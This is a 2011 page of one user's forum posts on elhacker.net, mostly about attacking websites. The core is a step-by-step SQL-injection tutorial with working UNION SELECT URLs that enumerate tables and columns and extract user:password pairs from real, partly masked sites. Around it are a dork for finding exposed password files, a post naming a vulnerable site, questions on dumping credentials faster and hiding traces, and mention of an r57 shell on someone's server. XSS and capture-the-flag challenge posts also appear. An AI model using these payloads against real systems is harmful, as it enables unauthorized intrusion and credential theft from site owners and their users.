elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: 1 2 [3] 4 5
21  Foros Generales / Foro Libre / tipos de hash en: 18 Septiembre 2011, 22:53 pm
DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

..... y muchos mas....

fuente:http://forum.insidepro.com/viewtopic.php?t=8225
22  Seguridad Informática / Nivel Web / dork zend de exploit-db en: 11 Septiembre 2011, 22:39 pm
Los Dork's son peligrosos, eso todos lo sabemos, bueno, pues aqui les dejo un ejemplo de como se pueden usar. La verdad no tinen ninguna ciencia.

En concreto este:

Google search: filetype:ini "Bootstrap.php" (pass|passwd|password|pwd)
Submited: 2011-08-25

http://www.youtube.com/watch?v=KJCnUlv-Xj4
23  Seguridad Informática / Nivel Web / vulnerable a injeccion remota SQL en: 31 Agosto 2011, 23:33 pm
Citar
**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

http://bestfan.com/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,11,12--

***********************************************
******************ruben_linux******************
***********************************************

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

 ;-) ;-)
24  Seguridad Informática / Nivel Web / sqli+bug+exploit=videotuto en: 25 Agosto 2011, 23:47 pm
Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

 +and+1=0

3.- buscamos union select

Citar

4.- buscamos las tablas

Citar
http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citar
http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citar
   vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

25  Seguridad Informática / Bugs y Exploits / como hacer SQLi más rápido??? y las huellas....??? en: 25 Agosto 2011, 01:33 am
select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--

voy cambiando el limit y me va dando las parejas.

Pero seguro que hay alguna manera de sacarlos todos juntos, pq así dejas mucho rastro, me refiero que en el server quedan registradas las peticiones SQLi, una web por la que pase el otro día, me dejo una atenta nota, pero al cambiar la ip ya me dejaba volver.

Este es otro tema por el que tengo curiosidad, vosotros borráis las huellas?? como?? o solo usáis proxy??
26  Seguridad Informática / Criptografía / en que formato esta estos pass??? en: 24 Agosto 2011, 00:22 am
Haciendo SQLi pude encontrar una lista de pass

x5h77h:
083a38:
mihrpt:
xoma03:

El caso es que no se en que formato estan. Alguien puede ayudarme?? no encuentro nada.
27  Seguridad Informática / Bugs y Exploits / mi primer SQLi, tutorial de una experiencia. en: 23 Agosto 2011, 01:00 am
Buenas a todos. Este es mi primer pos en este foro despues de la presentacion. Como anillo al dedo me viene, pues este tuto me lo he currado en un dia, mientras hacia SQLi, para no perder detalle.

Empezamos.

1. buscar una web vulnerable, a esta parte no le dedico tiempo, todos conocemos los DORKs, packetstorm, vbulletin.....


2. Como se que esta web es vulnerable??? Facil, la mayoria de las web te devolveran, cuando les modiques la peticion a algo como esto:

Citar
Warning: mysql_query() [function.mysql-query]: Access denied for user '*******'@'localhost' (using password: NO) in /home/justonli/public_html/demo_online_store/themes/2/func_util.php on line 3

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/********/public_html/demo_online_store/themes/2/func_util.php on line 3

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/*********/public_html/demo_online_store/themes/2/func_util.php on line 4

Warning: mysql_query() [function.mysql-query]: Access denied for user '***********'@'localhost' (using password: NO) in /home/*********/public_html/demo_online_store/themes/2/index.php on line 39

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/********/public_html/demo_online_store/themes/2/index.php on line 39

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/*********/public_html/demo_online_store/themes/2/index.php on line 40

En mi caso usé otro DORK. Que como se modifica una peticion?? Pues en la barra de direccion, donde esta la URL, algunas webs ponen algo como:

Código:
index.php?id=1
search.php?ID=25

Si nosotros cambiamos en la barra de direccion el 1 o el 25 por algo como -1, ', '2, etc, la web que no esta preparada para recibir estos datos nos devuelve un error como los de arriva. En mi caso le añadi "+and+1=0" (sin comillas).

Ya sabemos cuando es vulnerable.

3. Como aprobecho esa Vulnerabilidad??? pues hay varias formas, yo explicaare la que use.
Tenemos que encontrar el numero de "Union Columns" que con mi poco ingles supongo que sera "uninon de columnas" :-) esto es el numero de comunlas del la tabla que tiene la base de datos, para entender esto: en la base de datos <deportes> tenemos la tabla <acuaticos> y dentro de esta columna <surf>, que contiene srfing, bodyboard, sky_surfing,... pues en las web que almacenan bd sulen tener algo como <db_usuarios> y dentro la tabal <user> y una columna con el nombre <pass>. Dentro de una bd tendremos muchas tablas y dentro de estas cada una tendrá varias columnas.

En mi caso son 25, para averiguar esto:

Código:
http://victima.es/main.php?id=-1
http://victima.es/main.php?id=-1+union+select+1,2--
http://victima.es/main.php?id=-1+union+select+1,2,3--
http://victima.es/main.php?id=-1+union+select+1,2,3,4--
http://victima.es/main.php?id=-1+union+select+1,2,3,4,5......etc

Vamos añadiendo numeros hasta que nos de el resultado de la img.


By rubenlinux at 2011-08-22

Código:
http://****.it/web1/**********&macrocategoria_cliccata=1004+and+1=0+%20Union%20Select%20%201%20,2%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

y nos muestra unos numeros en la pantalla, en lugar de la web.

En mi caso muestra un "2".

Esta es la posicion donde tenemos que meter las peticiones SQL. Tendremos que sustituir el numero, por la peticion.

Ahora queremos saber el nombre de las tablas. Para esto añadimos en la posicion del numero "2" esto "group_concat%28table_name%29%" y al final de la url "from+information_schema.tables" esto traducido seria algo como: dame el nombre de todas la tablas que tienes en information.schema


By rubenlinux at 2011-08-22

Código:
http://******.it/web1/master.php**********&macrocategoria=1004&macrocategoria_cliccata=1004+and+1=0+%20Union%20Select%20%201%20,group_concat%28table_name%29%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables

Ya tenenos las tablas, en mi caso estan en Italiano, nos interesa conocer el numero de columnas dentro de la tabla por la cual tenemos curiosidad, para esto cambiamos lo que escribimos antes en el lugar del "2" por "group_concat%28column_name%29%" esta vez preguntamos por las columnas de una tabla, tambien cambiamos el final por "+from+information_schema.columns+where+table_name=%20char%2895,117,116,101,110,116,105%29".

Donde el número "95,117,116,101,110,116,105" es el nombre de la tabla,pero con los caracteres ascii. En internet teneis un monton cuadros y programillas para pasarlo.


By rubenlinux at 2011-08-22

Ya casi terminamos, lo que ahora queremos es saber que tenemos en cada columna, la pregunta seria algo como: que hay dentro de la columna pass dentro de la tabla usuarios dentro de la bd_principal? mas o menos. En este caso tenemos que hacer una nueva peticion con: "concat_ws%28char%2858%29,NOMBRE_DE_LA_COLUMNA%29" en el lugar del numero "2" y al final "+from+NOMBRE_DE_LA_TABLA"

Código:
http://*****.it/web1/***********&macrocategoria=1004&macrocategoria_cliccata=1004+and+1=0+%20Union%20Select%20%201%20,concat_ws%28char%2858%29,NOMBRE_DE_LA_COLUMNA%29%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+NOMBRE_DE_LA_TABLA
28  Foros Generales / Dudas Generales / acceso+r57 shell= y ahora que??? en: 19 Agosto 2011, 02:52 am
Me encontre con esto, pero ahora no se que hacer. No tengo intencion de j**** la web de nadie. no se si esta bien mostrar esto.

Se que esto no es ninguna novedad, me di cuenta cuando empezaron a aparecer montones hackeadas, que si los sirios, que si los chinos, ....
y yo por medio sin saber que hacer con una de estas. Mañana empiezo a documentarme.


http://subefotos.com/ver/?6cf0425f76dc112d827723460dfde689o.png

http://subefotos.com/ver/?f09c43e4a60c145714f9b8ba2c222347o.png

http://subefotos.com/ver/?5f2109b415dc1fa36c659989a1ffe0ddo.png

29  Seguridad Informática / WarZone / Hack-Web_Foro en: 17 Agosto 2011, 02:19 am
Saludos a tod@s. Estoy bloqueado en esta prueba, os dejo mis experiencias/pruebas, para animaros a contestarme, aunque esto no es una pregunta.  :)

Sabemos que tiene filtrado, y buscando sobre este tema, encontré mucho en google:

magic quotes. Este filtro se ocupa de adherir una \ a las comillas que pongamos en nuestro código malicioso.

Strip_Tags . Esta función se encarga de eliminar de una variable todo lo que esté entre < >, elimina etiquetas html.

htmlspecialchars. Convierte caracteres especiales en entidades HTML(para codigo PHP)

PHP Input Filter. es una clase escrita en PHP que permite filtrar código malicioso ingresado en los formularios para prevenir ataques XSS de manera sencilla, tiene la cualidad de no limpiar determinadas etiquetas o atributos.

Bueno, y así toda la vida.....

Que nos interesa a nosotros, pues ni p*** idea, porque no se programar, perooooooo.
Bueno el caso es:

en el area de texto introducimos: "<script>alert('XSS')</script>"
en la web se nos muestra: "alert(\'XSS\')"
y en codigo fuente vemos:
Código:
<div style="overflow: auto; width: 100%;">alert(\'XSS\')</script></div>


Podemos fijarnos, que en el código, no muestra toda la etiqueta "<script>". Eso por que es??? es ese el filtrado????

Otra prueba:

en el area de texto introducimos:&lt;script&gt;alert()&lt;/script&gt;
en la web se nos muestra: <script>alert()</script>
en el codigo fuente vemos:
Código:
<div style="overflow: auto; width: 100%;">&lt;script&gt;alert()&lt;/script&gt;</div>

Esta vez no filtra los caracteres especiales, porque ya están codificados con "htmlspecialchars" de la que ya os hable antes.

Otras pruebas:

He intentado añadir HTML al final de mi xss para cerrar asi el "<div>" pero esto tampoco funciona, en la fuente siempre aparece un "</div>" al final de linea que impide seguir a delante.

Para mi, el camino que tiene mejor pinta es el de "htmlspecialchars" puesto que conseguí que publique "<script>" y "</script>" que con las otras formas no pude, la cosa ahora es, que se ejecute ese maldito codigo, para lo cual pienso que necesito mas tag´s en mi declaración.

Porfavor, comentar.
30  Seguridad Informática / WarZone / reto: JWS en: 12 Agosto 2011, 18:34 pm
Saludos a tod@s.

En el reto JWS, he modificado las cookies de la siguiente manera:

Citar
GET
http://warzone.elhacker.net/jsw/src.php?ok=oooook&confrim=523******84dc420088add6*****

Cookie: PHPSESSID=523******84dc420088add6d*******; ........

Y el resultado es:

Citar
correcto='E*******';alert("Hay un error, actualiza la pagina, o activa tus cookies");top.location.reload();
tapo el nombre por si es importante, que no lo se¿?

Y si tengo las cookies activas.

despues cuando actualizo, esto es lo que me devuelve:

Citar
/*Alt Size Decryptor Function, by Alice Morgan*\ function asdf(q){document.cookie.dcr=new function(pp)return document.cookie.dcr(((hex(q)-'C')*8.64+((bin(q)*7)/11)).susbtr(5,5))} \*a******@***.edu*/respuesta.corecta=self.location.href;function dc(s){if(respuesta.corecta.charAt(1)=='i'){return asdf('C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 3D C0 22 C1 13 C1 25 C1 23 C1 35 C1 32 C1 29 C1 34 C1 39 C0 2D C1 06 C1 2F C1 23 C1 35 C1 33 C0 22 C0 3B C0 0D C0 0A C1 37 C1 28 C1 29 C1 2C C1 25 C0 28 C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 2E C1 2C C1 25 C1 2E C1 27 C1 34 C1 28 C0 3C C0 31 C0 35 C0 30 C0 30 C0 30 C0 29 C1 3B C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 2B C0 3D C0 22 C1 1C C1 2E C1 05 C1 32 C1 29 C1 23 C1 2B C1 33 C1 2F C1 2E C0 22 C1 3D ');}else{return asdf(s)}}eval(dc('C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 3D C1 35 C1 2E C1 25 C1 33 C1 23 C1 21 C1 30 C1 25 C0 28 C0 22 C0 25 C0 36 C0 36 C0 25 C0 33 C0 36 C0 25 C0 33 C0 33 C0 25 C0 33 C0 36 C0 25 C0 36 C0 35 C0 25 C0 36 C0 33 C0 25 C0 33 C0 33 C0 25 C0 33 C0 36 C0 25 C0 33 C0 37 C0 25 C0 33 C0 31 C0 25 C0 33 C0 38 C0 25 C0 36 C0 32 C0 25 C0 33 C0 33 C0 25 C0 33 C0 38 C0 25 C0 33 C0 34 C0 25 C0 33 C0 38 C0 25 C0 36 C0 33 C0 25 C0 33 C0 34 C0 25 C0 36 C0 34 C0 25 C0 33 C0 37 C0 25 C0 33 C0 39 C0 25 C0 33 C0 37 C0 25 C0 33 C0 33 C0 25 C0 33 C0 32 C0 25 C0 33 C0 31 C0 25 C0 33 C0 30 C0 25 C0 36 C0 32 C0 25 C0 36 C0 34 C0 25 C0 33 C0 31 C0 25 C0 33 C0 37 C0 25 C0 36 C0 36 C0 25 C0 36 C0 35 C0 22 C0 29 C0 3B '));

alguien me puede ayudar con esto? no se mucho de programación, por no decir nada.
Páginas: 1 2 [3] 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines